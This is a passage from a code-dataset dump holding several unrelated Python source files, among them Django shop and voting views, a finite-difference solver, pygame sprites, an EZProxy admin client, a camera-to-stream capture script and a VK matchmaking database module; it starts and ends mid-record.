"line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "38938698535", "text": "import requests\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.template import loader\nimport datetime\nfrom django.views.generic.list import ListView\nfrom .models import Tire, QuickOrderNewTire\nfrom .forms import QuickOrderNewTireForm\nfrom .filters import TireFilter\n\n# Create your views here.\n\n# class Home(ListView):\n \n# queryset = Tire.objects.all().order_by('-in_stock')\n# paginate_by = 2\n\n# template_name = 'new_tire/new-tire-list.html'\n\n# def get_context_data(self, **kwargs):\n# context = super().get_context_data(**kwargs)\n# context['filter'] = TireFilter(self.request.GET, queryset=self.get_queryset())\n\n \n# return context\n\ndef Home(request):\n f = TireFilter(request.GET, queryset=Tire.objects.all().order_by('-season', '-in_stock'))\n\n paginator = Paginator(f.qs, 33)\n page = request.GET.get('page')\n paged_listings = paginator.get_page(page)\n\n context = {\n 'filter': f,\n 'paginator_filter': paged_listings\n }\n\n if request.method == 'GET':\n print('Get')\n return render(request, 'new_tire/new-tire-list.html', context)\n\n\ndef TireDetail(request, slug):\n\n template = loader.get_template('new_tire/new_tire_detail.html')\n tire = get_object_or_404(Tire, slug=slug)\n\n \n if request.method == 'POST':\n form = QuickOrderNewTireForm(request.POST)\n \n #form.fields['phone'].validators = [MinValueValidator(500000000, message='Не вистачає цифри. Приклад: 0971234455'),\n # MaxValueValidator(999999999, message='Ви вели забагато цифр. Приклад: 0971234455')]\n\n if form.is_valid():\n qo = form.save(commit=False)\n try:\n QuickOrderNewTire.objects.get(phone=qo.phone, tire=tire)\n messages.success(request, \"Ваше замовлення отримано менеджером. Чекайте на дзвінок.\")\n except QuickOrderNewTire.DoesNotExist:\n if request.user.username == 'AnonymouseUser':\n \n obj, create = QuickOrderNewTire.objects.update_or_create(phone=qo.phone, tire=tire, price=tire.price_two)\n messages.success(request, \"Дякуємо! Заявка надіслана успішно! Скоро з Вами зв'яжеться наш менеджер.\")\n else:\n \n obj, create = QuickOrderNewTire.objects.update_or_create(phone=qo.phone, tire=tire, price=tire.price_two)\n messages.success(request, \"Дякуємо! Заявка надіслана успішно! Скоро з Вами зв'яжеться наш менеджер.\")\n else:\n form = QuickOrderNewTireForm()\n \n\n context = {\n 'tire': tire,\n 'form': form,\n }\n\n return HttpResponse(template.render(context, request))\n\n\n\ndef OlderRecords(request):\n\n template = loader.get_template('tires/old_tire.html')\n \n today = datetime.datetime.now() - datetime.timedelta(days=1)\n old_records = Tire.objects.filter(updated__lt=today, in_stock__gt=0 )\n counter = old_records.count()\n\n context = {\n 'old_records': old_records,\n 'counter': counter,\n }\n\n return HttpResponse(template.render(context, request))\n\n\ndef UpdatePrice(request):\n if request.user.is_superuser:\n today = datetime.datetime.now() - datetime.timedelta(hours=15)\n old_records = Tire.objects.filter(updated__lt=today, in_stock__gt=0 ).update(in_stock=0)\n else:\n pass\n\n return redirect('/')\n\n", "repo_name": "dikiyvolchara/car", "sub_path": "new_tire/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "filters.TireFilter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tire.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 48, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Tire", "line_number": 49, "usage_type": "argument"}, {"api_name": "forms.QuickOrderNewTireForm", "line_number": 53, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 61, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 62, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.DoesNotExist", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 63, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.objects.update_or_create", "line_number": 66, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 66, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 67, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.objects.update_or_create", "line_number": 70, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 70, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 71, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 71, "usage_type": "name"}, {"api_name": "forms.QuickOrderNewTireForm", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 87, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 87, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "models.Tire.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 90, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 103, "usage_type": "call"}, {"api_name": "models.Tire.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 104, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "30952349403", "text": "from django.shortcuts import render_to_response\nfrom thestar.models import Competitor, Vote\nfrom django.http import HttpResponse\n\ndef home(request):\n template = 'home.html'\n\n competitors = Competitor.objects.all()\n data = {'competitors': competitors}\n return render_to_response(template, data)\n\ndef vote(request):\n no = request.GET['no']\n competitor = Competitor.objects.get(no=no)\n vote = Vote()\n vote.competitor = competitor\n vote.save()\n return HttpResponse('OK')\n", "repo_name": "prontoaom/basic_python_django", "sub_path": "day2/my_first_app/thestar/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "thestar.models.Competitor.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "thestar.models.Competitor", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 10, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects.get", "line_number": 14, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "thestar.models.Competitor", "line_number": 14, "usage_type": "name"}, {"api_name": "thestar.models.Vote", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "40836695152", "text": "import autograd.numpy as np\n\ndef fd_central(r, q, p, x, y_a, y_b, method=\"central\"):\n\n if type( x ) != np.ndarray:\n if type( x ) == list:\n x = np.array( x )\n else:\n x = np.array( [ float( x ) ] )\n\n n = len( x )\n\n # Make sure that u, v, and w are either scalars or n-element vectors.\n # If they are scalars then we create vectors with the scalar value in\n # each position.\n\n if type( r ) == int or type( r ) == float:\n r = np.array( [ float( r ) ] * n )\n\n if type( q ) == int or type( q ) == float:\n q = np.array( [ float( q ) ] * n )\n\n if type( p ) == int or type( p ) == float:\n p = np.array( [ float( p ) ] * n )\n\n # Compute the stepsize. It is assumed that all elements in t are\n # equally spaced.\n\n h = x[1] - x[0]\n print(h)\n if method == \"central\":\n ai = (1 + (1/2) * h**2 * q)\n bi = (-1/2) * ((h/2) * p + 1)\n ci = (-1/2) * (1 - (h/2) * p)\n ri = (-1/2) * h**2 * r\n elif method == \"backward\":\n ai = -2/h**2 -p/h - q\n bi = 1/h**2 + p/h\n ci = np.array([1/h**2] * n)\n ri = r\n elif method == \"foward\":\n ai = (-2/h**2) + p/h - q\n bi = np.array([1/h**2] * n)\n ci = (1/h**2) - p/h\n ri = r\n print(bi)\n else:\n pass\n\n ri[1] = ri[1] - (bi[1]*y_a)\n ri[-2] = ri[-2] - (ci[-2]*y_b)\n\n A = np.diag(ai[1:-1]) + np.diag(bi[2:-1], -1) + np.diag(ci[1:-2], 1)\n\n y = np.linalg.solve(A, ri[1:-1])\n y = np.concatenate(([y_a], y, [y_b]))\n return y", "repo_name": "gilmarfrancisco828/fapesp2020", "sub_path": "pos_mac_equacoes/trabalho_pratico_01/fd_central.py", "file_name": "fd_central.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "autograd.numpy.ndarray", "line_number": 5, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 5, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 7, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 9, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 18, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 21, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 39, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 43, "usage_type": "name"}, {"api_name": "autograd.numpy.diag", "line_number": 53, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 53, "usage_type": "name"}, {"api_name": "autograd.numpy.linalg.solve", "line_number": 55, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 55, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 55, "usage_type": "name"}, {"api_name": "autograd.numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "43170216352", "text": "import pygame\nimport pyBaba\n\n\nclass MapSprite(pygame.sprite.Sprite):\n def __init__(self, image, x, y, is_icon):\n if is_icon:\n self.image = pygame.image.load('./sprites/icon/{}.gif'.format(image))\n else:\n self.image = pygame.image.load('./sprites/text/{}.gif'.format(image))\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n pygame.sprite.Sprite.__init__(self)\n\n\nclass ResultImage(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n def update(self, status, screen_size):\n if status == pyBaba.PlayState.WON:\n self.size = max(screen_size[0], screen_size[1]) // 2\n self.image = pygame.transform.scale(pygame.image.load(\n './sprites/won.png'), (self.size, self.size))\n self.rect = self.image.get_rect()\n self.rect.center = (screen_size[0] // 2, screen_size[1] // 2)\n else:\n self.size = max(screen_size[0], screen_size[1]) // 2\n self.image = pygame.transform.scale(pygame.image.load(\n './sprites/lost.png'), (self.size, self.size))\n self.rect = self.image.get_rect()\n self.rect.center = (screen_size[0] // 2, screen_size[1] // 2)\n", "repo_name": "utilForever/baba-is-auto", "sub_path": "Extensions/BabaGUI/sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 1289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.sprite", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pyBaba.PlayState", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "11884569609", "text": "import json, os\nimport glob\nNewPaths = glob.glob(os.getcwd()+\"/Saves/Slot1/*.json\")\nOGPaths = glob.glob(os.getcwd()+\"/scenes/*.json\")\n\n\n#remove paths from Saves/Slot1\nfor path in NewPaths:\n os.remove(path)\n\nfor path in OGPaths:\n with open(path, 'r') as json_file:\n data = json.load(json_file)\n for gameObject in data[\"sprites\"]:\n if gameObject[\"id\"] == \"SceneTrigger\":\n scene_path = gameObject[\"scene_path\"]\n scenePathList = scene_path.split('/')\n fileName = scenePathList[len(scenePathList)-1]\n gameObject[\"scene_path\"] = \"./resources/Saves/Slot1/\"+fileName\n\n # write to saves/slot1\n pathList = path.split('/')\n newpath = os.getcwd()+\"/Saves/Slot1/\"+pathList[len(pathList)-1]\n with open(newpath, 'w') as json_file:\n json.dump(data, json_file, indent=4)\n\n\n\n\n\n\n# data = json.load(json_file)\n# for gameObject in data[\"sprites\"]:\n# gameObject[\"subtype\"] = 2\n#\n#\n# with open (filepath, 'w') as json_file:\n# json.dump(data, json_file, indent=4)", "repo_name": "petertran-21/untitled-ghost-game", "sub_path": "resources/resetScenes.py", "file_name": "resetScenes.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 3, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 3, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 4, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 4, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "8709982178", "text": "\"\"\"Module for controlling EZProxy server instance\"\"\"\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nfrom . import stanzas\nfrom .stanzas import StanzaUtil\n\n\nclass EzproxyServer:\n \"\"\"This is a class to represent an Ezproxy server instance\"\"\"\n def __init__(self, hostname, base_dir):\n self.hostname = hostname\n self.base_dir = base_dir\n self.__set_stanzas()\n self.__set_server_options()\n self.auth_cookie = None\n self.pid = None\n\n def __set_stanzas(self):\n with open(self.base_dir + \"/config/databases.conf\", \"r\") as stanza_file:\n self.stanzas = StanzaUtil.parse_stanzas(stanza_file.read())\n\n def __set_server_options(self):\n with open(self.base_dir + \"/config/server.conf\", \"r\") as options_file:\n options_array = []\n options_text = options_file.read()\n for line in options_text.splitlines():\n # Skip empty lines and comments\n if line.strip() and line.startswith(\"#\") is False:\n param = line.strip().split(' ', 1)\n # Force inital letter of key to be uppercase\n key = param[0][:1].upper() + param[0][1:]\n value = param[1].strip()\n options_array.append({key: value})\n self.options = options_array\n\n def login(self, username, password=None):\n \"\"\"Login to an instance of EZProxy\"\"\"\n # Get password from usertext file\n if password is None:\n with open(self.base_dir + \"/user.txt\", \"r\") as auth_file:\n for line in auth_file.readlines():\n if line.strip().startswith(username):\n password = line.split(\":\")[1]\n break\n\n login_url = \"https://login.\" + self.hostname + \"/login\"\n credentials = {\n \"user\": username,\n \"pass\": password\n }\n\n auth = requests.post(\n login_url,\n data=credentials,\n allow_redirects=False\n )\n auth_cookie = {}\n for key in auth.cookies.keys():\n if key.startswith(\"EZProxy\"):\n auth_cookie = {key: auth.cookies.get(key)}\n else:\n Exception(\"No authorized session found\")\n self.auth_cookie = auth_cookie\n self.get_pid()\n return True\n\n def logout(self):\n response = requests.get(\n \"https://\" + self.hostname + \"/logout\",\n self.auth_cookie,\n allow_redirects=False\n )\n return response.ok\n\n def get_pid(self):\n \"\"\"Get the current PID of EZProxy\"\"\"\n restart_url = \"https://login.\" + self.hostname + \"/restart\"\n restart_form = requests.get(\n restart_url,\n cookies=self.auth_cookie,\n allow_redirects=False\n )\n pid = BeautifulSoup(restart_form.text, \"html.parser\") \\\n .find_all(attrs={\"name\": \"pid\"})[0] \\\n .attrs[\"value\"]\n self.pid = pid\n\n def restart_ezproxy(self, no_wait=False):\n \"\"\"Restart this instance of EZProxy\"\"\"\n restart_url = \"https://login.\" + self.hostname + \"/restart\"\n restart_payload = {\n \"pid\": self.pid,\n \"confirm\": \"RESTART\"\n }\n\n try:\n restart_request = requests.post(\n restart_url,\n data=restart_payload,\n cookies=self.auth_cookie\n )\n if (BeautifulSoup(restart_request.text, \"html.parser\")\n .h1.next_sibling.strip() ==\n \"EZproxy will restart in 5 seconds.\"):\n if no_wait is False:\n time.sleep(5)\n self.get_pid()\n else:\n RuntimeError(\"Failed to restart server.\")\n except RuntimeError:\n pass\n return self.pid\n\n def get_stanzas(self):\n return self.stanzas\n\n def search_proxy(self, url=None, name=None):\n \"\"\"\n Search proxy instance for existing stanza with origin URL\n \"\"\"\n url_matches = set()\n name_matches = set()\n try:\n for i in range(len(self.get_stanzas())):\n stanza = self.get_stanzas()[i]\n if url:\n for origin in stanza.get_origins():\n if StanzaUtil.match_origin_url(url, origin):\n url_matches.add((i, stanza.name))\n break\n elif name and stanza.name.startswith(name):\n name_matches.add((i, stanza.name))\n\n if bool(url_matches) and bool(name_matches):\n return url_matches & name_matches\n elif bool(url_matches):\n return url_matches\n elif bool(name_matches):\n return name_matches\n\n except (AttributeError, TypeError):\n raise AssertionError(\n f\"Expected a list of Stanzas. Got {type(stanzas)}\")\n", "repo_name": "iinuwa/pyezproxy", "sub_path": "pyezproxy/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 5028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stanzas.StanzaUtil.parse_stanzas", "line_number": 21, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil", "line_number": 21, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 69, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 98, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 103, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil.match_origin_url", "line_number": 129, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil", "line_number": 129, "usage_type": "name"}]} +{"seq_id": "35562544030", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport cv2\nfrom cv2 import VideoWriter_fourcc, VideoWriter\nimport sys\nimport os\nimport requests\nimport v3io_frames as v3f\nimport base64\nimport time\n\n\n# In[ ]:\n\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nurl = \"http://%s/%s/%s/\"% (os.getenv('V3IO_WEBAPI'),os.getenv('IGZ_CONTAINER'),os.getenv('RAW_VIDEO_STREAM'))\nheaders = {\n \"Content-Type\": \"application/json\",\n \"X-v3io-function\": \"PutRecords\",\n \"X-v3io-session-key\" : os.getenv(\"V3IO_ACCESS_KEY\")\n }\n\n\n# In[2]:\n\n\ndef stream_frame_write(cameraID,payload):\n bef = time.time()\n r = requests.post(url, headers=headers,json=payload, verify=False) \n time_diff = time.time()-bef\n print(\"Post time %s. Response %s\"% (time_diff, r.text))\n return r.text\n\n\n# In[1]:\n\n\ndef start_capture(cameraID: str,\n cameraURL:str,\n shard: int):\n\n # To capture video from webcam.\n cap = cv2.VideoCapture(cameraURL)\n # To use a video file as input\n # cap = cv2.VideoCapture('filename.mp4')\n data_count = 1\n while True:\n\n # Display\n #cv2.imshow('img', img)\n\n fourcc = VideoWriter_fourcc(*'MPEG')\n running_size=0\n Records=[]\n while (cap.isOpened()):\n ret, img = cap.read()\n ret, buffer = cv2.imencode('.jpg', img)\n data = base64.b64encode(buffer)\n Records.append({\n \"Data\": data.decode('utf-8'),\n \"ShardId\" : shard\n })\n if data_count == 60:\n try:\n payload = {\"Records\": Records}\n r = stream_frame_write(cameraID,payload)\n except:\n print(\"Failed to write to shard %s\"% shard)\n data_count = 1\n\n\n # Stop if escape key is pressed\n #k = cv2.waitKey(0) & 0xff\n #if k==27:\n # break\n # Release the VideoCapture object\n cap.release()\n \n\n\n# In[4]:\n\n\ndef get_cameras_list():\n client = v3f.Client(os.getenv('V3IO_FRAMES'),container=os.getenv('IGZ_CONTAINER'))\n df=client.read('kv',os.getenv('CAMERA_LIST_TBL'))\n return df\n\n\n# In[5]:\n\n\ndef init_function():\n cameraID = os.getenv('cameraID')\n shardId = int(os.getenv('shardId'))\n cameraURL = os.getenv('cameraURL')\n \n if isinstance(cameraURL, int):\n cameraURL = int(cameraURL)\n \n cameras_list = get_cameras_list()\n for index, row in get_cameras_list().iterrows():\n if index == cameraID and row['shard'] == shardId and row['url'] == cameraURL and row['active'] == True:\n start_capture(cameraID,cameraURL,shardId)\n print(\"Invalid camera\")\n\n\n# In[ ]:\n\n\ninit_function()\n\n\n# Variables needed for container operations\n# \n# V3IO_ACCESS_KEY\n# \n# V3IO_USERNAME\n# \n# V3IO_WEBAPI\n# \n# V3IO_FRAMES \n# \n# IGZ_CONTAINER\n# \n# RAW_VIDEO_STREAM\n# \n# CAMERA_LIST_TBL\n# \n# shardId\n# \n# cameraID\n# \n# cameraURL\n\n# In[ ]:\n\n\n\n\n", "repo_name": "marcelonyc/iguazioCV", "sub_path": "Clients/dockerized/video_capture.py", "file_name": "video_capture.py", "file_ext": "py", "file_size_in_byte": 3026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 64, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 65, "usage_type": "call"}, {"api_name": "v3io_frames.Client", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 101, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "71420025473", "text": "import sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\nfrom db.models import create_tables\nfrom db.models import UserVKTinder, SearhPair, SearhPairPhoto\nfrom vk_api_my import VKAPIusers\nfrom tokens import Password_db, Login_db, Name_db\n\n\nDSN = f\"postgresql://{Login_db}:{Password_db}@localhost:5432/{Name_db}\"\nengine = sqlalchemy.create_engine(DSN) # Создание движка\ncreate_tables(engine) # создание таблиц\nSession = sessionmaker(bind=engine)\nsession = Session() #создание текущей сессии (в объявлениях функций передается как connection)\n\n\ndef add_user(user_id):\n ''' Функция добавления текущего юзера в БД'''\n info_list = VKAPIusers.get_vktinder_user(user_id) #получение данных о пользователе приложением из вк апи по его id(функция вызывается из модуля vk_api_my)\n users = UserVKTinder(user_vk_id=info_list[0]['id'], # преобразование пользователя в экземпляра класса UserVKTinder\n user_vktinder_name=info_list[0]['first_name'],\n user_vktinder_surname=info_list[0]['last_name'])\n session.add(users)\n session.commit() #фиксация изменений в БД\n\n\ndef check_user(connection, user_id):\n ''' Функция проверяет находится ли данный юзер в БД'''\n querys = connection.query(UserVKTinder.user_vk_id).filter(UserVKTinder.user_vk_id == user_id).first()\n return querys\n\n\ndef add_new(searh_users, user_id):\n objects_list = []\n for user in searh_users: #преобразование пользователя в экземпляра класса SearhPair\n info = SearhPair(\n searh_pair_name=user[\"name\"],\n searh_pair_surname=user[\"surname\"],\n searh_pair_page_link=user[\"page_link\"],\n searh_pair_vk_id=user[\"id\"],\n user_vktinder_id=user_id, # здесь происходит связывание искомого человека с тем кто его ищет (один ко многим)\n attribute=0\n )\n objects_list.append(info)\n session.add_all(objects_list)\n session.commit()\n if len(user[\"photo\"]) == 0: # здесь происходит связывание искомого человека с его фото (один ко многим)\n photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id)\n objects_list.append(photo)\n elif len(user[\"photo\"]) == 1:\n photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0])\n objects_list.append(photo)\n elif len(user[\"photo\"]) == 2:\n photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0], photo_2=user[\"photo\"][1])\n objects_list.append(photo)\n elif len(user[\"photo\"]) == 3:\n photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0], photo_2=user[\"photo\"][1],\n photo_3=user[\"photo\"][2])\n objects_list.append(photo) \n session.add_all(objects_list)\n session.commit() # фиксация изменений в БД\n session.close()\n\n\ndef get_new_searh_pair_info(connection, user_vk_id):\n '''для получения новых кандидатов после просмотра старых'''\n querys = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(\n SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 0).all()\n\n return querys\n\n\ndef update_db_attribute(connection, user_vktinder_id, searh_pair_id, attribute):\n '''Функция изменения параметра атрибут (attribute) в БД. На вход принимает связь с БД т.е сессию(session), id VK как пользователя приложения, так и искомого человека, а так же знвчение аттрибута:\n типа int: 1 - в список понравившихся, 2 - черный список'''\n update_searh_pair_id = connection.query(SearhPair.searh_pair_id).join(UserVKTinder).filter(SearhPair.searh_pair_vk_id == searh_pair_id, UserVKTinder.user_vk_id == user_vktinder_id).all()\n connection.query(SearhPair).filter(SearhPair.searh_pair_id == update_searh_pair_id[0][0]).update({\"attribute\": attribute})\n session.commit()\n session.close()\n\ndef get_list_likes_pair(connection, user_vk_id):\n '''Функция получения информации о пользователях для выдачи в приложении добавленных в список понравившихся (имеющих attribute == 1)\n Принимает на вход связь с БД т.е сессию(session) и VK id пользователя приложения. Возвращает список.'''\n list_likes_pair = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 1).all()\n return list_likes_pair\n\ndef get_list_blocked_pair(connection, user_vk_id):\n '''Функция получения информации о пользователях для выдачи в приложении добавленных в список заблокированных (имеющих attribute == 2)\n Принимает на вход связь с БД т.е сессию(session) и VK id пользователя приложения. Возвращает список.'''\n list_blocked_pair = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n 